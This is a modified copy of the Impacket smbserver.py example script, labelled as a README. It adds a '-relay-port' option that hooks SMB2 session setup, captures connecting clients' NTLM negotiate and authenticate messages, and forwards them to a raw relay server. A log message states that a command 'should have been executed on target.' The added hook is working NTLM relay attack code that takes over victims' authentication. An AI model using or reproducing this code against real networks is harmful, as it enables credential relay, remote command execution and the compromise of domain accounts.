README.md
Rendering markdown...
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# Simple SMB Server example.
#
# Author:
# Alberto Solino (@agsolino)
#
import sys
import argparse
import logging
import socket
import struct
import random
from impacket.examples import logger
from impacket import smbserver, version
from impacket.ntlm import compute_lmhash, compute_nthash
from impacket import smb3structs as smb3
from impacket import ntlm
from impacket.spnego import SPNEGO_NegTokenInit, SPNEGO_NegTokenResp, ASN1_AID, ASN1_SUPPORTED_MECH, TypesMech
from impacket.nt_errors import STATUS_MORE_PROCESSING_REQUIRED, STATUS_SUCCESS, STATUS_ACCESS_DENIED
if __name__ == '__main__':
# Init the example's logger theme
print(version.BANNER)
parser = argparse.ArgumentParser(add_help = True, description = "This script will launch a SMB Server and add a "
"share specified as an argument. Usually, you need to be root in order to bind to port 445. "
"For optional authentication, it is possible to specify username and password or the NTLM hash. "
"Example: smbserver.py -comment 'My share' TMP /tmp")
parser.add_argument('shareName', action='store', help='name of the share to add')
parser.add_argument('sharePath', action='store', help='path of the share to add')
parser.add_argument('-comment', action='store', help='share\'s comment to display when asked for shares')
parser.add_argument('-username', action="store", help='Username to authenticate clients')
parser.add_argument('-password', action="store", help='Password for the Username')
parser.add_argument('-computeraccountname', action="store", help='computer account name to authenticate arbitrary clients with signing via NetLogon/Kerberos')
parser.add_argument('-computeraccounthash', action="store", help='computer account NT hash to authenticate arbitrary clients with signing via NetLogon/Kerberos')
parser.add_argument('-computeraccountaes', action="store", help='computer account AES key to authenticate arbitrary clients with signing via NetLogon/Kerberos')
parser.add_argument('-computeraccountpassword', action="store", help='computer account NT hash to authenticate arbitrary clients with signing via NetLogon/Kerberos')
parser.add_argument('-computeraccountdomain', action="store", help='computer account domain to authenticate arbitrary clients with signing via NetLogon/Kerberos')
parser.add_argument('-dc-ip', action="store", help='IP of domain controller to authenticate arbitrary clients with signing via NetLogon/Kerberos')
parser.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes for the Username, format is LMHASH:NTHASH')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-ip', '--interface-address', action='store', default=argparse.SUPPRESS, help='ip address of listening interface ("0.0.0.0" or "::" if omitted)')
parser.add_argument('-readonly', action='store_true', help='Only allow reading of files')
parser.add_argument('-disablekerberos', action='store_true', help='Do not offer Kerberos authentication')
parser.add_argument('-disablentlm', action='store_true', help='Do not offer NTLM authentication')
parser.add_argument('-port', action='store', default='445', help='TCP port for listening incoming connections (default 445)')
parser.add_argument('-dropssp', action='store_true', default=False, help='Disable NTLM ESS/SSP during negotiation')
parser.add_argument('-6','--ipv6', action='store_true',help='Listen on IPv6')
parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)')
parser.add_argument('-outputfile', action='store', default=None, help='Output file to log smbserver output messages')
parser.add_argument('-relay-port', action='store', type=int, default=0, help='RAW relay server port to forward captured NTLM auth (0 = disabled)')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
try:
options = parser.parse_args()
except Exception as e:
logging.critical(str(e))
sys.exit(1)
logger.init(options.ts, options.debug)
if options.comment is None:
comment = ''
else:
comment = options.comment
if 'interface_address' not in options:
options.interface_address = '::' if options.ipv6 else '0.0.0.0'
server = smbserver.SimpleSMBServer(listenAddress=options.interface_address, listenPort=int(options.port), ipv6=options.ipv6)
if options.outputfile:
logging.info('Switching output to file %s' % options.outputfile)
server.setLogFile(options.outputfile)
server.addShare(options.shareName.upper(), options.sharePath, comment, readOnly="yes" if options.readonly else "no")
server.setSMB2Support(options.smb2support)
server.setDropSSP(options.dropssp)
server.setKerberosSupport(not options.disablekerberos)
server.setNTLMSupport(not options.disablentlm)
# If a user was specified, let's add it to the credentials for the SMBServer. If no user is specified, anonymous
# connections will be allowed
if options.username is not None:
# we either need a password or hashes, if not, ask
if options.password is None and options.hashes is None:
from getpass import getpass
password = getpass("Password:")
# Let's convert to hashes
lmhash = compute_lmhash(password)
nthash = compute_nthash(password)
elif options.password is not None:
lmhash = compute_lmhash(options.password)
nthash = compute_nthash(options.password)
else:
lmhash, nthash = options.hashes.split(':')
server.addCredential(options.username, 0, lmhash, nthash)
# If we want clients to be able to connect to us which enforce signing, we need a computer account to properly setup the connection
# Only works with SMB2
required_secure_server_options = [options.computeraccountname, options.computeraccountdomain, options.dc_ip]
at_least_one_secure_server_options = [options.computeraccounthash, options.computeraccountaes, options.computeraccountpassword]
if any(required_secure_server_options):
if options.username:
logging.critical("You cannot use account credentials AND computer account credentials at the same time")
sys.exit(1)
if not all(required_secure_server_options):
logging.critical("All of the following options need to be set for accepting signed connections from arbitrary users in the domain: -computeraccountname, -computeraccountdomain, -dc-ip")
sys.exit(1)
if not any(at_least_one_secure_server_options):
logging.critical("At least one of the following options need to be set for accepting signed connections from arbitrary users in the domain: -computeraccounthash, -computeraccountaes, -computeraccountpassword")
sys.exit(1)
server.setComputerAccount(options.computeraccountname, options.computeraccounthash, options.computeraccountaes, options.computeraccountpassword, options.computeraccountdomain, options.dc_ip)
# Here you can set a custom SMB challenge in hex format
# If empty defaults to '4141414141414141'
# (remember: must be 16 hex bytes long)
# e.g. server.setSMBChallenge('12345678abcdef00')
server.setSMBChallenge('')
if options.relay_port > 0:
internalServer = server.getServer()
origSmb2SessionSetup = internalServer.hookSmb2Command(smb3.SMB2_SESSION_SETUP, None)
_relay_state = {}
def _extract_raw_ntlm(securityBlob):
rawNTLM = False
if len(securityBlob) == 0:
return b'', 0, rawNTLM
firstByte = struct.unpack('B', securityBlob[0:1])[0]
if firstByte == ASN1_AID:
blob = SPNEGO_NegTokenInit(securityBlob)
token = blob['MechToken']
elif firstByte == ASN1_SUPPORTED_MECH:
blob = SPNEGO_NegTokenResp(securityBlob)
token = blob['ResponseToken']
else:
token = securityBlob
rawNTLM = True
if len(token) >= 12 and token[:8] == b'NTLMSSP\x00':
msgType = struct.unpack('<I', token[8:12])[0]
else:
msgType = 0
return token, msgType, rawNTLM
def _build_spnego_challenge_resp(challengeBlob, rawNTLM):
if rawNTLM:
return challengeBlob
respToken = SPNEGO_NegTokenResp()
respToken['NegState'] = b'\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeBlob
return respToken.getData()
def _build_spnego_auth_resp(rawNTLM):
if rawNTLM:
return b''
respToken = SPNEGO_NegTokenResp()
respToken['NegState'] = b'\x00'
return respToken.getData()
def hookedSessionSetup(connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus=False)
sessionSetupData = smb3.SMB2SessionSetup(recvPacket['Data'])
securityBlob = sessionSetupData['Buffer']
token, msgType, rawNTLM = _extract_raw_ntlm(securityBlob)
state = _relay_state.get(connId, 'init')
if state == 'init':
result = origSmb2SessionSetup(connId, smbServer, recvPacket)
if msgType == 3:
_relay_state[connId] = 'first_auth_done'
return result
if state in ('first_auth_done', 'relay_negotiated') and msgType == 1:
oldSock = connData.get('relaySocket')
if oldSock:
try:
oldSock.close()
except:
pass
connData['relaySocket'] = None
logging.info("[RELAY] Second SESSION_SETUP detected (NTLM NEGOTIATE) - relaying to RAW server port %d", options.relay_port)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(10)
sock.connect(('127.0.0.1', options.relay_port))
sock.sendall(struct.pack('<h', len(token)) + token)
chal_len = struct.unpack('<h', sock.recv(2))[0]
challengeBlob = b''
while len(challengeBlob) < chal_len:
challengeBlob += sock.recv(chal_len - len(challengeBlob))
except Exception as e:
logging.error("[RELAY] Failed to connect/relay NEGOTIATE to RAW server: %s", e)
respCmd = smb3.SMB2SessionSetup_Response()
respCmd['SecurityBufferOffset'] = 0x48
respCmd['SecurityBufferLength'] = 0
respCmd['Buffer'] = b''
return [respCmd], None, STATUS_ACCESS_DENIED
connData['relaySocket'] = sock
connData['relayRawNTLM'] = rawNTLM
connData['Uid'] = random.randint(1, 0xffffffff)
_relay_state[connId] = 'relay_negotiated'
respBytes = _build_spnego_challenge_resp(challengeBlob, rawNTLM)
respCmd = smb3.SMB2SessionSetup_Response()
respCmd['SecurityBufferOffset'] = 0x48
respCmd['SecurityBufferLength'] = len(respBytes)
respCmd['Buffer'] = respBytes
smbServer.setConnectionData(connId, connData)
return [respCmd], None, STATUS_MORE_PROCESSING_REQUIRED
if state == 'relay_negotiated' and msgType == 3:
logging.info("[RELAY] Received NTLM AUTHENTICATE - forwarding to RAW server")
sock = connData.get('relaySocket')
if sock is None:
respCmd = smb3.SMB2SessionSetup_Response()
respCmd['SecurityBufferOffset'] = 0x48
respCmd['SecurityBufferLength'] = 0
respCmd['Buffer'] = b''
return [respCmd], None, STATUS_ACCESS_DENIED
try:
sock.sendall(struct.pack('<h', len(token)) + token)
result_len = struct.unpack('<h', sock.recv(2))[0]
success_data = sock.recv(result_len)
relaySuccess = struct.unpack('?', success_data[:1])[0]
sock.close()
except Exception as e:
logging.error("[RELAY] Failed to relay AUTH to RAW server: %s", e)
try:
sock.close()
except:
pass
respCmd = smb3.SMB2SessionSetup_Response()
respCmd['SecurityBufferOffset'] = 0x48
respCmd['SecurityBufferLength'] = 0
respCmd['Buffer'] = b''
return [respCmd], None, STATUS_ACCESS_DENIED
if relaySuccess:
logging.info("[RELAY] NTLM relay succeeded! Command should have been executed on target.")
connData['Authenticated'] = True
connData['relaySocket'] = None
_relay_state[connId] = 'first_auth_done'
respBytes = _build_spnego_auth_resp(connData.get('relayRawNTLM', False))
respCmd = smb3.SMB2SessionSetup_Response()
respCmd['SecurityBufferOffset'] = 0x48
respCmd['SecurityBufferLength'] = len(respBytes)
respCmd['Buffer'] = respBytes
smbServer.setConnectionData(connId, connData)
return [respCmd], None, STATUS_SUCCESS
else:
logging.error("[RELAY] NTLM relay failed - authentication rejected")
connData['relaySocket'] = None
_relay_state[connId] = 'first_auth_done'
respCmd = smb3.SMB2SessionSetup_Response()
respCmd['SecurityBufferOffset'] = 0x48
respCmd['SecurityBufferLength'] = 0
respCmd['Buffer'] = b''
return [respCmd], None, STATUS_ACCESS_DENIED
logging.warning("[RELAY] Unexpected state=%s msgType=%d", state, msgType)
return origSmb2SessionSetup(connId, smbServer, recvPacket)
internalServer.hookSmb2Command(smb3.SMB2_SESSION_SETUP, hookedSessionSetup)
logging.info("[RELAY] SMB2 SESSION_SETUP hook installed, relay port=%d", options.relay_port)
# Rock and roll
try:
server.start()
except KeyboardInterrupt:
print("\nInterrupted, exiting...")
sys.exit(130)